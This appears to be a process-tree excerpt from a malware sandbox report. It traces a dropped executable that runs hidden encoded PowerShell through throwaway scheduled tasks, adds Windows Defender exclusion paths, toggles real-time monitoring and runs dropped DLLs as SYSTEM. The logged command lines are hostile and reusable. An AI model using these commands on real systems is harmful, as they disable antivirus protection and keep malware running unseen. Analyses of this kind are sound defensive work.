                Command line: schtasks /CREATE /TN "gjKyctEUn" /SC once /ST 15:38:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                (The -EncodedCommand value is UTF-16LE base64 and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force; the same encoded command is reused by every powershell.EXE and schtasks entry below.)
                - Creates scheduled task(s)
                PID: 592

            [4] C:\Windows\SysWOW64\schtasks.exe
                Command line: schtasks /run /I /tn "gjKyctEUn"
                PID: 1872

            [4] C:\Windows\SysWOW64\schtasks.exe
                Command line: schtasks /DELETE /F /TN "gjKyctEUn"
                PID: 2008

            [4] C:\Windows\SysWOW64\schtasks.exe
                Command line: schtasks /CREATE /TN "bNmmFmDfYxkEbHwDyL" /SC once /ST 21:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn\EjhfMQNsEakjnpG\WKxmouy.exe\" 5L /site_id 525403 /S" /V1 /F
                - Drops file in Windows directory
                - Creates scheduled task(s)
                PID: 1252

[1] C:\Windows\system32\taskeng.exe
    Command line: taskeng.exe {FE8BA8C8-D809-414A-B129-54F65FA66ADF} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
    PID: 540

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1920

        [3] C:\Windows\system32\gpupdate.exe
            Command line: "C:\Windows\system32\gpupdate.exe" /force
            PID: 872

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2028

        [3] C:\Windows\system32\gpupdate.exe
            Command line: "C:\Windows\system32\gpupdate.exe" /force
            PID: 788

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1580

        [3] C:\Windows\system32\gpupdate.exe
            Command line: "C:\Windows\system32\gpupdate.exe" /force
            PID: 332

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 268

        [3] C:\Windows\system32\gpupdate.exe
            Command line: "C:\Windows\system32\gpupdate.exe" /force
            PID: 1808

[1] C:\Windows\system32\gpscript.exe
    Command line: gpscript.exe /RefreshSystemParam
    PID: 1720

[1] C:\Windows\system32\taskeng.exe
    Command line: taskeng.exe {D9548BC4-5D20-4E04-BAB6-1EDA8B6D9CF2} S-1-5-18:NT AUTHORITY\System:Service:
    PID: 1132

    [2] C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn\EjhfMQNsEakjnpG\WKxmouy.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn\EjhfMQNsEakjnpG\WKxmouy.exe 5L /site_id 525403 /S
        - Executes dropped EXE
        - Drops file in System32 directory
        PID: 536

        [3] C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /CREATE /TN "gjFPLpYOG" /SC once /ST 11:04:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
            - Creates scheduled task(s)
            PID: 1992

        [3] C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /run /I /tn "gjFPLpYOG"
            PID: 704

        [3] C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /DELETE /F /TN "gjFPLpYOG"
            PID: 1008

        [3] C:\Windows\SysWOW64\cmd.exe
            Command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            PID: 1780

            [4] C:\Windows\SysWOW64\reg.exe
                Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                - Modifies Windows Defender Real-time Protection settings
                PID: 2016

        [3] C:\Windows\SysWOW64\cmd.exe
            Command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
            PID: 1976

            [4] C:\Windows\SysWOW64\reg.exe
                Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                - Modifies Windows Defender Real-time Protection settings
                PID: 1184

        [3] C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /CREATE /TN "gIbnCAvuX" /SC once /ST 11:57:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
            - Creates scheduled task(s)
            PID: 1052

        [3] C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /run /I /tn "gIbnCAvuX"
            PID: 572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gIbnCAvuX"3⤵PID:1532
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:323⤵PID:1408
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:643⤵PID:1528
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:323⤵PID:1936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:324⤵PID:2016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:643⤵PID:1628
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:644⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\rxGmlNEdrxIyNebK\OKoGVfBb\eVEdgxeuLGyrARWz.wsf"3⤵PID:1976
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\rxGmlNEdrxIyNebK\OKoGVfBb\eVEdgxeuLGyrARWz.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1052 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZbDVoFOXNENU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZbDVoFOXNENU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oEaTcchOPpGVC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oEaTcchOPpGVC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sVKkdmDjU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sVKkdmDjU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uGQUxmMVndUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uGQUxmMVndUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qZroPUUiMzyEdOVB" /t REG_DWORD /d 0 /reg:324⤵PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qZroPUUiMzyEdOVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn" /t REG_DWORD /d 0 /reg:324⤵PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:644⤵PID:572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZbDVoFOXNENU2" /t REG_DWORD /d 0 /reg:324⤵PID:548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZbDVoFOXNENU2" /t REG_DWORD /d 0 /reg:644⤵PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR" /t REG_DWORD /d 0 /reg:324⤵PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR" /t REG_DWORD /d 0 /reg:644⤵PID:616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oEaTcchOPpGVC" /t REG_DWORD /d 0 /reg:324⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oEaTcchOPpGVC" /t REG_DWORD /d 0 /reg:644⤵PID:1980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sVKkdmDjU" /t REG_DWORD /d 0 /reg:324⤵PID:1300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sVKkdmDjU" /t REG_DWORD /d 0 /reg:644⤵PID:296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uGQUxmMVndUn" /t REG_DWORD /d 0 /reg:324⤵PID:1996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uGQUxmMVndUn" /t REG_DWORD /d 0 /reg:644⤵PID:1640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qZroPUUiMzyEdOVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qZroPUUiMzyEdOVB" /t REG_DWORD /d 0 /reg:644⤵PID:2000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn" /t REG_DWORD /d 0 /reg:644⤵PID:872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:324⤵PID:1136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rxGmlNEdrxIyNebK" /t REG_DWORD /d 0 /reg:644⤵PID:1780
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXiTQJNvZ" /SC once /ST 12:27:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXiTQJNvZ"3⤵PID:1916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXiTQJNvZ"3⤵PID:296
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1952
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1048
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1560
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CXoLteMjLNFiDzwgz" /SC once /ST 17:38:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rxGmlNEdrxIyNebK\vYUSkvZZxmbwyEr\xHZNvQg.exe\" co /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CXoLteMjLNFiDzwgz"3⤵PID:2000
-
-
-
C:\Windows\Temp\rxGmlNEdrxIyNebK\vYUSkvZZxmbwyEr\xHZNvQg.exeC:\Windows\Temp\rxGmlNEdrxIyNebK\vYUSkvZZxmbwyEr\xHZNvQg.exe co /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1860 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNmmFmDfYxkEbHwDyL"3⤵PID:472
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:952
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:928
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1572
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\sVKkdmDjU\BoLWlc.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qryHMmQcYEgLlBC" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qryHMmQcYEgLlBC2" /F /xml "C:\Program Files (x86)\sVKkdmDjU\PrunerE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qryHMmQcYEgLlBC"3⤵PID:1004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qryHMmQcYEgLlBC"3⤵PID:1744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FSGWlFXiGyxeqN" /F /xml "C:\Program Files (x86)\ZbDVoFOXNENU2\ADlLMVt.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TnCImqpKohWXw2" /F /xml "C:\ProgramData\qZroPUUiMzyEdOVB\lEqMxpO.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZASwyFgQZKHRrMOFZ2" /F /xml "C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR\gYYCjto.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YLAVRIYeZlKSGLryrkX2" /F /xml "C:\Program Files (x86)\oEaTcchOPpGVC\JjpmzGh.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PEfpnAabivfJAexgy" /SC once /ST 07:40:43 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\rxGmlNEdrxIyNebK\VipEfLrZ\CSmXDoi.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "PEfpnAabivfJAexgy"3⤵PID:1436
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1120
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1948
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:704
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CXoLteMjLNFiDzwgz"3⤵PID:1632
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rxGmlNEdrxIyNebK\VipEfLrZ\CSmXDoi.dll",#1 /site_id 5254032⤵PID:592
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rxGmlNEdrxIyNebK\VipEfLrZ\CSmXDoi.dll",#1 /site_id 5254033⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:1936
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1532
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1948
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-644474614206127381344062763-648645217-1957303675-1514247783-44155891160988584"1⤵
- Windows security bypass
PID:572
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1724
Network
MITRE ATT&CK Enterprise v6
Downloads